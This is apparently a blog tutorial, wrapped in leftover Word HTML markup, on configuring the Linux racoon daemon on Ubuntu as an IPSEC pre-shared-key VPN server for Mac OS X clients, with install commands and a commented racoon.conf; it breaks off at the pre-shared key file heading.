UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Cambria;
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<!--StartFragment-->
<br />
<div class="MsoNormal">
If you use a Linux based router gateway, and MAC-OSX
Mountain Lion, being able to created an IPSEC VPN tunnel back to your home site
can be very useful. The MAC-OSX Lion
IPSEC client will use ISAKMP over UDP port 500 to negotiate the appropriate
phase one key exchange parameters in order to setup a UDP NAT-Traversal IPSEC
tunnel over UDP port 4500 back to your home site. <o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Here I include a pre-shared key based example configuration of
the Linux KAME “racoon” daemon to run as an IPSEC server, and configure the
MAC-OSX native IPSEC client to connect to it.
The Linux based server system in this example is Ubuntu 12.04.1 server
running on a Soekris NET6501-50. For
more information on what Soekris has to offer, visit the web URL <a href="http://www.soekris.com/">http://www.soekris.com/</a>. <br />
<br />
Under Ubuntu, you will need to install two different packages in order to get
started.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">
# apt-get install ipsec-tools<br />
# apt-get install racoon</span>
<br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
For the remainder of this example, I will assume that your Ubuntu Linux based
system has a public IP address of <b>240.9.9.9</b>,
and that your desired VPN address range is <b>10.222.1.0/24</b>. I will also assume that your router gateway
is properly configured for Network Address Translation (NAT) using iptables for
any address that is part of your internal network which I will consider as
anything in the <b>10.0.0.0/8</b> address
range. I will also assume that you are
running your own internal network DNS server at <b>10.1.1.1.</b> Proper configuration
of iptables is not included in this blog entry.<br />
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;">Public network address: 240.9.9.9</span><br />
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;">Internal LAN Network: 10.0.0.0/8</span><br />
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;">VPN network pool: 10.222.1.0/24</span><br />
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;">DNS Server: 10.1.1.1</span><br />
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;">DNS domain: “domain.tld”</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
After you have installed the “racoon” package, the
configuration file should be located as the file path <b>/etc/racoon/racoon.conf</b>.<o:p></o:p></div>
<div class="MsoNormal">
<br />
We will start with a fully commented <b>racoon.conf</b>
example based on the above information in order to illustrate how to configure
an IPSEC VPN. This configuration is based
on a pre-shared key rather than certificate based VPN for simplicity sake, and
due to the additional complexity involved with setting up your own certifying
authority, generating, signing, and importing a certificate for use.</div>
<div class="MsoNormal">
<br />
<br /></div>
<div class="MsoNormal">
</div>
<h3>
<span style="color: #0c343d;">Racoon Configuration File</span></h3>
<span style="font-family: 'Courier New', Courier, monospace; font-size: 10pt;"># set
syslog level and pre-shared key file</span><br />
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">log
notify;<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">path
pre_shared_key "/etc/racoon/psk.txt";<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">listen {<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> adminsock disabled; #do not listen on the admin socket<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> isakmp 240.9.9.9 [500]; #address
for ISAKMP<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> isakmp_natt 240.9.9.9 [4500]; #address for ISAKMP NAT-Traversal<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> strict_address; #strictly bind these addresses<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">}<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">remote
anonymous { #anonymous matches ANY
ipsec client<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> exchange_mode main; #ISAKMP phase 1 exchange mode<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> ph1id 16; #phase 1 proposal identifier<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> proposal_check claim; #claim our own lifetime value<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> lifetime time 12 hour;#phase 1 lifetime<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> mode_cfg on; #gather
network information through ISAKMP<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> generate_policy on; #generate ipsec policy from initiator SA payload<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> nat_traversal on; #enable use of NAT-Traversal extension<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> dpd_delay 3600; #enable dead peer
detection and set time at 3600 secs<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> proposal { #phase
1 proposal<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> encryption_algorithm aes; #phase 1 encryption algorithm<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> hash_algorithm sha1; #phase 1 hash algorithm<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> authentication_method xauth_psk_server;
#use xauth pre-shared key method<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> dh_group 2; #use
diffie-hellman group 2 (modp1024)<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> }<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">}<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">#
specific mode configuration<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">mode_cfg
{<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> auth_source system; #user auth source (system=Unix user)<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> group_source system; #group validation source (system=Unix groups)<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> conf_source local; #user local pool information below<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> network4 10.222.1.50; #base/first address in VPN pool<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> netmask4 255.255.255.0; #VPN pool network mask<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> pool_size 50; #VPN
pool size<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> dns4 10.1.1.1; #VPN pool DNS
server<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> default_domain "domain.tld";#optional
VPN pool domain suffix<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> banner "/etc/racoon/motd"; #optional VPN pool message of the day<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">}<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">#
security association info<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">sainfo
anonymous { #anonymous
matches any/all SA<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> encryption_algorithm aes; #phase 2 encryption algorithm(s)<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> authentication_algorithm hmac_sha1; #phase 2 authentication hash<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> compression_algorithm deflate; #phase 2 compression<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> remoteid 16; #phase
2 remoteid to match phase 1<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">}</span><span style="font-family: Courier;"><o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<br />
<h3>
<span style="font-family: Courier New, Courier, monospace; font-size: small;">Linux Server Pre-Shared Key File</span></h3>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>156</o:Words>
<o:Characters>894</o:Characters>
<o:Company>NWN</o:Company>
<o:Lines>7</o:Lines>
<o:Paragraphs>2</o:Paragraphs>
<o:CharactersWithSpaces>1048</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
<w:UseFELayout/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
